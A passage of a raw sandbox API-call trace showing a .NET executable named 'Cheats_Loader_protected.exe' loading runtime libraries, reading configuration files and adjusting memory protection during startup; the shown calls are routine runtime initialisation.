0x772d0000 [0057.242] GetProcAddress (hModule=0x772d0000, lpProcName="AddDllDirectory") returned 0x74d2bbb0 [0057.249] FreeLibrary (hLibModule=0x0) returned 0 [0057.869] SysReAllocStringLen (in: pbstr=0x13fef8c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fef8c*="kernel32.dll") returned 1 [0057.869] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0057.869] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0057.872] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0057.879] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x374 [0057.879] GetLastError () returned 0x0 [0057.879] SysReAllocStringLen (in: pbstr=0x13feff8*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x13feff8*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux") returned 1 [0057.879] GetThreadLocale () returned 0x409 [0057.879] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0057.879] GetThreadLocale () returned 0x409 [0057.879] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0057.879] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x13fed7c, lpFilePart=0x13fed78 | out: lpBuffer="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", lpFilePart=0x13fed78*="mscorlib.ni.dll.aux") returned 0x6c [0057.880] SysReAllocStringLen (in: pbstr=0x13feff8*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x13feff8*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux") returned 1 [0057.880] SysReAllocStringLen (in: pbstr=0x13fefa8*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x13fefa8*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux") returned 1 [0057.880] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", cchLength=0x6c | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux") returned 0x6c [0057.880] SysReAllocStringLen (in: pbstr=0x13feff8*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x13feff8*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll.aux") returned 1 [0057.880] SetLastError (dwErrCode=0x0) [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] SetEvent (hEvent=0x20c) returned 1 [0057.880] GetFileSize (in: hFile=0x374, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0 [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] GetCurrentThreadId () returned 0x13dc [0057.880] SetEvent (hEvent=0x20c) returned 1 [0057.880] ReadFile (in: hFile=0x374, lpBuffer=0x13ff110, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x13ff0ac, lpOverlapped=0x0 | out: lpBuffer=0x13ff110*, lpNumberOfBytesRead=0x13ff0ac*=0xb0, lpOverlapped=0x0) returned 1 [0057.881] GetCurrentThreadId () returned 0x13dc [0057.881] ResetEvent (hEvent=0x200) returned 1 [0057.881] GetCurrentThreadId () returned 0x13dc [0057.881] GetCurrentThreadId () returned 0x13dc [0057.881] GetCurrentThreadId () returned 0x13dc [0057.881] GetCurrentThreadId () returned 0x13dc [0057.881] ResetEvent (hEvent=0x200) returned 1 [0057.881] GetCurrentThreadId () returned 0x13dc [0057.882] GetCurrentThreadId () returned 0x13dc [0057.882] SetEvent (hEvent=0x20c) returned 1 [0057.882] SetEvent (hEvent=0x200) returned 1 [0057.882] CloseHandle (hObject=0x374) returned 1 [0057.885] SysReAllocStringLen (in: pbstr=0x13fe5b4*=0x0, psz="mscorlib.ni.dll", len=0xf | out: pbstr=0x13fe5b4*="mscorlib.ni.dll") returned 1 [0057.885] CharLowerBuffW (in: lpsz="mscorlib.ni.dll", cchLength=0xf | out: lpsz="mscorlib.ni.dll") returned 0xf [0057.885] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\f12799647dc4f4abd2f0f17790337f04\\mscorlib.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x725d0000 [0059.081] GetLastError () returned 0x0 [0059.081] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.081] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0059.081] SetLastError (dwErrCode=0x0) [0059.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0059.165] GetLastError () returned 0x0 [0059.165] SysReAllocStringLen (in: pbstr=0x13ff090*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff090*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0059.165] GetThreadLocale () returned 0x409 [0059.165] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.165] GetThreadLocale () returned 0x409 [0059.165] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.165] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x104, lpBuffer=0x13fee14, lpFilePart=0x13fee10 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x13fee10*="Cheats_Loader_protected.exe") returned 0x33 [0059.165] SysReAllocStringLen (in: pbstr=0x13ff090*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff090*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0059.165] SysReAllocStringLen (in: pbstr=0x13ff040*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff040*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0059.165] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchLength=0x33 | out: lpsz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 0x33 [0059.165] SysReAllocStringLen (in: pbstr=0x13ff090*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0x13ff090*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0059.165] GetCurrentThreadId () returned 0x13dc [0059.165] ResetEvent (hEvent=0x200) returned 1 [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] ResetEvent (hEvent=0x200) returned 1 [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] SetEvent (hEvent=0x20c) returned 1 [0059.166] SetEvent (hEvent=0x200) returned 1 [0059.166] SetLastError (dwErrCode=0x0) [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] ResetEvent (hEvent=0x200) returned 1 [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] GetCurrentThreadId () returned 0x13dc [0059.166] ResetEvent (hEvent=0x200) returned 1 [0059.167] GetCurrentThreadId () returned 0x13dc [0059.167] GetCurrentThreadId () returned 0x13dc [0059.167] SetEvent (hEvent=0x20c) returned 1 [0059.167] SetEvent (hEvent=0x200) returned 1 [0059.167] CloseHandle (hObject=0x348) returned 1 [0059.169] SysReAllocStringLen (in: pbstr=0x13ff224*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x13ff224*="ole32.dll") returned 1 [0059.169] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0059.169] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0059.169] GetLastError () returned 0x7e [0059.169] SetLastError (dwErrCode=0x7e) [0059.169] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c164, cbMultiByte=9, lpWideCharStr=0x13fe6f8, cchWideChar=2047 | out: lpWideCharStr="ole32.dll犔\x10") returned 9 [0059.169] SysReAllocStringLen (in: pbstr=0x13ff6fc*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x13ff6fc*="ole32.dll") returned 1 [0059.169] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0059.169] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x753c0000 [0059.169] GetLastError () returned 0x0 [0059.170] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.170] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0059.170] GetModuleFileNameA (in: hModule=0x753c0000, lpFilename=0x13ff5e4, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0059.170] GetCurrentProcess () returned 0xffffffff [0059.170] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6e8*=0x7548c820, NumberOfBytesToProtect=0x13ff6ec, NewAccessProtection=0x4, OldAccessProtection=0x13ff720 | out: BaseAddress=0x13ff6e8*=0x7548c000, NumberOfBytesToProtect=0x13ff6ec, OldAccessProtection=0x13ff720*=0x2) returned 0x0 [0059.170] GetCurrentProcess () returned 0xffffffff [0059.170] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6e8*=0x7548c820, NumberOfBytesToProtect=0x13ff6ec, NewAccessProtection=0x2, OldAccessProtection=0x13ff720 | out: BaseAddress=0x13ff6e8*=0x7548c000, NumberOfBytesToProtect=0x13ff6ec, OldAccessProtection=0x13ff720*=0x4) returned 0x0 [0059.170] GetCurrentProcess () returned 0xffffffff [0059.170] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6e8*=0x7548c828, NumberOfBytesToProtect=0x13ff6ec, NewAccessProtection=0x4, OldAccessProtection=0x13ff720 | out: BaseAddress=0x13ff6e8*=0x7548c000, NumberOfBytesToProtect=0x13ff6ec, OldAccessProtection=0x13ff720*=0x2) returned 0x0 [0059.171] GetCurrentProcess () returned 0xffffffff [0059.171] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6e8*=0x7548c828, NumberOfBytesToProtect=0x13ff6ec, NewAccessProtection=0x2, OldAccessProtection=0x13ff720 | out: BaseAddress=0x13ff6e8*=0x7548c000, NumberOfBytesToProtect=0x13ff6ec, OldAccessProtection=0x13ff720*=0x4) returned 0x0 [0059.171] SetLastError (dwErrCode=0x0) [0059.171] GetProcAddress (hModule=0x753c0000, lpProcName="CoInitializeEx") returned 0x74a22590 [0059.180] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0059.189] SysReAllocStringLen (in: pbstr=0x13ff224*=0x0, psz="api-ms-win-core-winrt-l1-1-0.dll", len=0x20 | out: pbstr=0x13ff224*="api-ms-win-core-winrt-l1-1-0.dll") returned 1 [0059.189] CharLowerBuffW (in: lpsz="api-ms-win-core-winrt-l1-1-0.dll", cchLength=0x20 | out: lpsz="api-ms-win-core-winrt-l1-1-0.dll") returned 0x20 [0059.189] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\api-ms-win-core-winrt-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0059.190] GetLastError () returned 0x7e [0059.190] SetLastError (dwErrCode=0x7e) [0059.190] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe6c06c, cbMultiByte=32, lpWideCharStr=0x13fe6fc, cchWideChar=2047 | out: lpWideCharStr="api-ms-win-core-winrt-l1-1-0.dllcorlib") returned 32 [0059.190] SysReAllocStringLen (in: pbstr=0x13ff700*=0x0, psz="api-ms-win-core-winrt-l1-1-0.dll", len=0x20 | out: pbstr=0x13ff700*="api-ms-win-core-winrt-l1-1-0.dll") returned 1 [0059.190] CharLowerBuffW (in: lpsz="api-ms-win-core-winrt-l1-1-0.dll", cchLength=0x20 | out: lpsz="api-ms-win-core-winrt-l1-1-0.dll") returned 0x20 [0059.190] LoadLibraryExA (lpLibFileName="api-ms-win-core-winrt-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x74940000 [0059.190] GetLastError () returned 0x0 [0059.191] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.191] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0059.191] GetModuleFileNameA (in: hModule=0x74940000, lpFilename=0x13ff5e8, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")) returned 0x1f [0059.191] GetCurrentProcess () returned 0xffffffff [0059.191] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6ec*=0x74b3f374, NumberOfBytesToProtect=0x13ff6f0, NewAccessProtection=0x4, OldAccessProtection=0x13ff724 | out: BaseAddress=0x13ff6ec*=0x74b3f000, NumberOfBytesToProtect=0x13ff6f0, OldAccessProtection=0x13ff724*=0x2) returned 0x0 [0059.191] GetCurrentProcess () returned 0xffffffff [0059.191] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6ec*=0x74b3f374, NumberOfBytesToProtect=0x13ff6f0, NewAccessProtection=0x2, OldAccessProtection=0x13ff724 | out: BaseAddress=0x13ff6ec*=0x74b3f000, NumberOfBytesToProtect=0x13ff6f0, OldAccessProtection=0x13ff724*=0x4) returned 0x0 [0059.191] GetCurrentProcess () returned 0xffffffff [0059.191] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6ec*=0x74b3f37c, NumberOfBytesToProtect=0x13ff6f0, NewAccessProtection=0x4, OldAccessProtection=0x13ff724 | out: BaseAddress=0x13ff6ec*=0x74b3f000, NumberOfBytesToProtect=0x13ff6f0, OldAccessProtection=0x13ff724*=0x2) returned 0x0 [0059.192] GetCurrentProcess () returned 0xffffffff [0059.192] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff6ec*=0x74b3f37c, NumberOfBytesToProtect=0x13ff6f0, NewAccessProtection=0x2, OldAccessProtection=0x13ff724 | out: BaseAddress=0x13ff6ec*=0x74b3f000, NumberOfBytesToProtect=0x13ff6f0, OldAccessProtection=0x13ff724*=0x4) returned 0x0 [0059.192] SetLastError (dwErrCode=0x0) [0059.192] GetProcAddress (hModule=0x74940000, lpProcName="RoInitialize") returned 0x74a24d90 [0059.192] RoInitialize () returned 0x1 [0059.192] GetProcAddress (hModule=0x74940000, lpProcName="RoUninitialize") returned 0x74a59390 [0059.193] RoUninitialize () returned 0x0 [0059.380] SysReAllocStringLen (in: pbstr=0x13fed3c*=0x0, psz="api-ms-win-core-xstate-l2-1-0.dll", len=0x21 | out: pbstr=0x13fed3c*="api-ms-win-core-xstate-l2-1-0.dll") returned 1 [0059.381] CharLowerBuffW (in: lpsz="api-ms-win-core-xstate-l2-1-0.dll", cchLength=0x21 | out: lpsz="api-ms-win-core-xstate-l2-1-0.dll") returned 0x21 [0059.381] LoadLibraryExW (lpLibFileName="api-ms-win-core-xstate-l2-1-0.dll", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0059.381] GetLastError () returned 0x0 [0059.381] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.381] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0059.381] GetModuleFileNameA (in: hModule=0x74bc0000, lpFilename=0x13fec20, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0059.381] SetLastError (dwErrCode=0x0) [0059.381] GetProcAddress (hModule=0x74bc0000, lpProcName="GetEnabledXStateFeatures") returned 0x74cbe710 [0059.383] SysReAllocStringLen (in: pbstr=0x13feb2c*=0x0, psz="clrjit.dll", len=0xa | out: pbstr=0x13feb2c*="clrjit.dll") returned 1 [0059.383] CharLowerBuffW (in: lpsz="clrjit.dll", cchLength=0xa | out: lpsz="clrjit.dll") returned 0xa [0059.383] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", hFile=0x0, dwFlags=0x8) returned 0x72550000 [0059.555] GetLastError () returned 0x0 [0059.555] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.555] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0059.555] GetModuleFileNameA (in: hModule=0x72550000, lpFilename=0x13fea10, nSize=0x105 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0059.555] GetCurrentProcess () returned 0xffffffff [0059.555] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13feb14*=0x725c100c, NumberOfBytesToProtect=0x13feb18, NewAccessProtection=0x4, OldAccessProtection=0x13feb4c | out: BaseAddress=0x13feb14*=0x725c1000, NumberOfBytesToProtect=0x13feb18, OldAccessProtection=0x13feb4c*=0x2) returned 0x0 [0059.556] GetCurrentProcess () returned 0xffffffff [0059.556] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13feb14*=0x725c100c, NumberOfBytesToProtect=0x13feb18, NewAccessProtection=0x2, OldAccessProtection=0x13feb4c | out: BaseAddress=0x13feb14*=0x725c1000, NumberOfBytesToProtect=0x13feb18, OldAccessProtection=0x13feb4c*=0x4) returned 0x0 [0059.556] GetCurrentProcess () returned 0xffffffff [0059.556] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13feb14*=0x725c1050, NumberOfBytesToProtect=0x13feb18, NewAccessProtection=0x4, OldAccessProtection=0x13feb4c | out: BaseAddress=0x13feb14*=0x725c1000, NumberOfBytesToProtect=0x13feb18, OldAccessProtection=0x13feb4c*=0x2) returned 0x0 [0059.556] GetCurrentProcess () returned 0xffffffff [0059.556] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13feb14*=0x725c1050, NumberOfBytesToProtect=0x13feb18, NewAccessProtection=0x2, OldAccessProtection=0x13feb4c | out: BaseAddress=0x13feb14*=0x725c1000, NumberOfBytesToProtect=0x13feb18, OldAccessProtection=0x13feb4c*=0x4) returned 0x0 [0059.556] GetCurrentProcess () returned 0xffffffff [0059.556] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13feb14*=0x725c1054, NumberOfBytesToProtect=0x13feb18, NewAccessProtection=0x4, OldAccessProtection=0x13feb4c | out: BaseAddress=0x13feb14*=0x725c1000, NumberOfBytesToProtect=0x13feb18, OldAccessProtection=0x13feb4c*=0x2) returned 0x0 [0059.557] GetCurrentProcess () returned 0xffffffff [0059.557] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13feb14*=0x725c1054, NumberOfBytesToProtect=0x13feb18, NewAccessProtection=0x2, OldAccessProtection=0x13feb4c | out: BaseAddress=0x13feb14*=0x725c1000, NumberOfBytesToProtect=0x13feb18, OldAccessProtection=0x13feb4c*=0x4) returned 0x0 [0059.557] SetLastError (dwErrCode=0x0) [0059.557] GetProcAddress (hModule=0x72550000, lpProcName="sxsJitStartup") returned 0x725a4430 [0059.557] GetProcAddress (hModule=0x72550000, lpProcName="jitStartup") returned 0x0 [0059.557] GetProcAddress (hModule=0x72550000, lpProcName="getJit") returned 0x725a3d60 [0059.570] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\pubpol120.dat" (normalized: "c:\\windows\\assembly\\pubpol120.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0059.571] GetLastError () returned 0x0 [0059.571] SysReAllocStringLen (in: pbstr=0x13fb600*=0x0, psz="C:\\WINDOWS\\assembly\\pubpol120.dat", len=0x21 | out: pbstr=0x13fb600*="C:\\WINDOWS\\assembly\\pubpol120.dat") returned 1 [0059.571] GetThreadLocale () returned 0x409 [0059.571] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\pubpol120.dat", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.571] GetThreadLocale () returned 0x409 [0059.571] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\pubpol120.dat", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.571] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\pubpol120.dat", nBufferLength=0x104, lpBuffer=0x13fb384, lpFilePart=0x13fb380 | out: lpBuffer="C:\\WINDOWS\\assembly\\pubpol120.dat", lpFilePart=0x13fb380*="pubpol120.dat") returned 0x21 [0059.571] SysReAllocStringLen (in: pbstr=0x13fb600*="C:\\WINDOWS\\assembly\\pubpol120.dat", psz="C:\\WINDOWS\\assembly\\pubpol120.dat", len=0x21 | out: pbstr=0x13fb600*="C:\\WINDOWS\\assembly\\pubpol120.dat") returned 1 [0059.571] SysReAllocStringLen (in: pbstr=0x13fb5b0*=0x0, psz="C:\\WINDOWS\\assembly\\pubpol120.dat", len=0x21 | out: pbstr=0x13fb5b0*="C:\\WINDOWS\\assembly\\pubpol120.dat") returned 1 [0059.571] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\pubpol120.dat", cchLength=0x21 | out: lpsz="c:\\windows\\assembly\\pubpol120.dat") returned 0x21 [0059.571] SysReAllocStringLen (in: pbstr=0x13fb600*="C:\\WINDOWS\\assembly\\pubpol120.dat", psz="c:\\windows\\assembly\\pubpol120.dat", len=0x21 | out: pbstr=0x13fb600*="c:\\windows\\assembly\\pubpol120.dat") returned 1 [0059.571] SetLastError (dwErrCode=0x0) [0059.576] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0059.576] GetLastError () returned 0x0 [0059.576] SysReAllocStringLen (in: pbstr=0x13fbd6c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13fbd6c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0059.576] GetThreadLocale () returned 0x409 [0059.576] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.576] GetThreadLocale () returned 0x409 [0059.576] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x13fbaf0, lpFilePart=0x13fbaec | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x13fbaec*="machine.config") returned 0x43 [0059.576] SysReAllocStringLen (in: pbstr=0x13fbd6c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13fbd6c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0059.576] SysReAllocStringLen (in: pbstr=0x13fbd1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13fbd1c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0059.576] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0059.576] SysReAllocStringLen (in: pbstr=0x13fbd6c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13fbd6c*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0059.576] SetLastError (dwErrCode=0x0) [0059.577] GetCurrentThreadId () returned 0x13dc [0059.577] GetCurrentThreadId () returned 0x13dc [0059.577] GetCurrentThreadId () returned 